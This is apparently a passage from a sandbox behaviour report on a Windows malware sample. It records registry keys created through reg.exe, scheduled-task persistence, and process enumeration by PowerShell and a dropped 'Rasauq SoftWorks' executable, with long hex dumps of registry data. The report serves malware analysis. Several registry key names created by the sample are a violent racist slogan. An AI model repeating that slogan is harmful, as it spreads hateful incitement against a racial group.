000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 N/A N/A
Key created \Registry\User\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache N/A N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133863617754787282" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers C:\Windows\system32\reg.exe N/A
Key created \Registry\User\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{17A1C827-CEA6-48F4-B44C-278232D11007} N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c200602000400500010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 N/A N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
